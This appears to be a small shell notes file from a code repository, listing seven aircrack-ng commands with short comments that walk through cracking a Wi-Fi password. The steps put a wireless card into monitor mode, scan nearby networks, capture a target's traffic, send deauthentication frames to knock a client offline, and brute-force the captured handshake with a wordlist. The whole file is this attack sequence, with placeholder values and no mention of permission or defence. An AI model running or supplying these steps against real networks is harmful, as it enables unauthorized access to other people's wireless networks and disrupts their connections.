Files
sh/wifi
T
2026-05-22 15:21:21 +08:00

8 lines
392 B
Plaintext

airmon-ng #Looking for device
airmon-ng start wlan0 #Start Listen Mode
airodump-ng wlan0mon #Scan surroudings wifi
airodump-ng -c ID --bssid address -w /file/name wlan0mon #Begin to capture packet
aireplay-ng -0 2 -a router -c client wlan0mon #Begin to De-authentication
aircrack-ng -w passwd name #Begin to attack packet
airmon-ng stop wlan0mon #Close Listen Mode